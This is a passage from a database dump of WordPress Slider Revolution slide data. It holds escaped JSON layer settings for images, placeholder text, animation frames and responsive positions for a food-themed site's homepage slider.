Image 14\",\"alias\":\"Image 14\",\"uid\":14,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/landing-cimet-img-2.png\",\"imageId\":3565},\"size\":{\"width\":{\"d\":{\"v\":\"400px\",\"e\":true},\"n\":{\"v\":\"304px\",\"e\":true},\"t\":{\"v\":\"237px\",\"e\":true},\"m\":{\"v\":\"237px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"290px\",\"e\":true},\"n\":{\"v\":\"220px\",\"e\":true},\"t\":{\"v\":\"172px\",\"e\":true},\"m\":{\"v\":\"172px\",\"e\":true}},\"originalWidth\":400,\"originalHeight\":290,\"aspectRatio\":{\"d\":{\"v\":1.3793103448275863},\"n\":{\"v\":1.3793103448275863},\"t\":{\"v\":1.3793103448275863},\"m\":{\"v\":1.3793103448275863}}},\"position\":{\"x\":{\"d\":{\"v\":\"-190px\",\"e\":true},\"n\":{\"v\":\"-11px\",\"e\":true},\"t\":{\"v\":\"-174px\",\"e\":true},\"m\":{\"v\":\"-3px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"398px\",\"e\":true},\"n\":{\"v\":\"298px\",\"e\":true},\"t\":{\"v\":\"326px\",\"e\":true},\"m\":{\"v\":\"179px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":17,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":17,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"bottom\"},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":\"-20deg\",\"rotationY\":\"-20deg\",\"rotationZ\":\"0deg\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.out\",\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.out\",\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1480,\"start\":9000,\"startRelative\":7500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"15\":{\"text\":\"Image 15\",\"alias\":\"Image 15\",\"uid\":15,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/recept-11.png\",\"imageId\":4590},\"size\":{\"width\":{\"d\":{\"v\":\"528px\",\"e\":true},\"n\":{\"v\":\"428px\",\"e\":true},\"t\":{\"v\":\"344px\",\"e\":true},\"m\":{\"v\":\"344px\"}},\"height\":{\"d\":{\"v\":\"629px\",\"e\":true},\"n\":{\"v\":\"510px\",\"e\":true},\"t\":{\"v\":\"410px\",\"e\":true},\"m\":{\"v\":\"410px\"}},\"originalWidth\":552,\"originalHeight\":657,\"aspectRatio\":{\"d\":{\"v\":0.8401826484018264},\"n\":{\"v\":0.8401826484018264},\"t\":{\"v\":0.8401826484018264},\"m\":{\"v\":0.8401826484018264}}},\"position\":{\"x\":{\"d\":{\"v\":\"80px\",\"e\":true},\"n\":{\"v\":\"208px\",\"e\":true},\"t\":{\"v\":\"-6px\",\"e\":true},\"m\":{\"v\":\"433px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"145px\",\"e\":true},\"n\":{\"v\":\"102px\",\"e\":true},\"t\":{\"v\":\"155px\",\"e\":true},\"m\":{\"v\":\"124px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\"}},\"zIndex\":18,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":18,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":900,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1340,\"start\":9000,\"startRelative\":8100,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"action\":[{\"tooltip_event\":\"click\",\"action\":\"link\",\"image_link\":\"http:\\/\\/succulents.select-themes.com\\/summer-booze\\/\",\"link_open_in\":\"_blank\",\"link_follow\":\"follow\",\"jump_to_slide\":\"\",\"scrollunder_offset\":\"\",\"action_easing\":\"none\",\"action_speed\":\"\",\"actioncallback\":\"\",\"layer_target\":\"backgroundvideo\",\"link_type\":\"a\",\"action_delay\":\"\",\"toggle_layer_type\":\"visible\",\"toggle_class\":\"\"}],\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"17\":{\"text\":\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout and web page.\",\"alias\":\"It is a long establi...\",\"uid\":17,\"size\":{\"width\":{\"d\":{\"v\":\"348px\",\"e\":true},\"n\":{\"v\":\"348px\",\"e\":true},\"t\":{\"v\":\"348px\",\"e\":true},\"m\":{\"v\":\"348px\"}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"originalWidth\":\"348px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-541px\",\"e\":true},\"n\":{\"v\":\"-419px\",\"e\":true},\"t\":{\"v\":\"245px\",\"e\":true},\"m\":{\"v\":\"245px\"}},\"y\":{\"d\":{\"v\":\"-59px\",\"e\":true},\"n\":{\"v\":\"126px\",\"e\":true},\"t\":{\"v\":\"322px\",\"e\":true},\"m\":{\"v\":\"322px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":19,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":19,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\"}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\",\"version\":\"6.6.0\"},\"18\":{\"text\":\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout and web page.\",\"alias\":\"It is a long establi...\",\"uid\":18,\"size\":{\"width\":{\"d\":{\"v\":\"348px\",\"e\":true},\"n\":{\"v\":\"348px\"},\"t\":{\"v\":\"348px\",\"e\":true},\"m\":{\"v\":\"348px\"}},\"height\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"originalWidth\":\"348px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-541px\",\"e\":true},\"n\":{\"v\":\"-418px\",\"e\":true},\"t\":{\"v\":\"245px\",\"e\":true},\"m\":{\"v\":\"245px\"}},\"y\":{\"d\":{\"v\":\"-59px\",\"e\":true},\"n\":{\"v\":\"273px\",\"e\":true},\"t\":{\"v\":\"322px\",\"e\":true},\"m\":{\"v\":\"322px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"e\":true}},\"zIndex\":20,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":20,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\"},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\"},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\"}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\"},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\"},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(2,2,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h1-slide1-background1.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"01\"},{\"v\":\"03\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[1000]},\"effects\":{\"parallax\":\"9\"},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"2\":{\"text\":\"Image 2\",\"alias\":\"Image 2\",\"uid\":2,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h1-slider1-graphic1.png\",\"imageId\":1043},\"size\":{\"width\":{\"d\":{\"v\":\"65px\",\"e\":true},\"n\":{\"v\":\"65px\",\"e\":true},\"t\":{\"v\":\"65px\"},\"m\":{\"v\":\"65px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"52px\",\"e\":true},\"n\":{\"v\":\"52px\",\"e\":true},\"t\":{\"v\":\"52px\"},\"m\":{\"v\":\"52px\",\"e\":true}},\"originalWidth\":65,\"originalHeight\":52,\"aspectRatio\":{\"d\":{\"v\":1.25},\"n\":{\"v\":1.25},\"t\":{\"v\":1.25},\"m\":{\"v\":1.25}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"v\":\"4px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"159px\",\"e\":true},\"n\":{\"v\":\"-139px\",\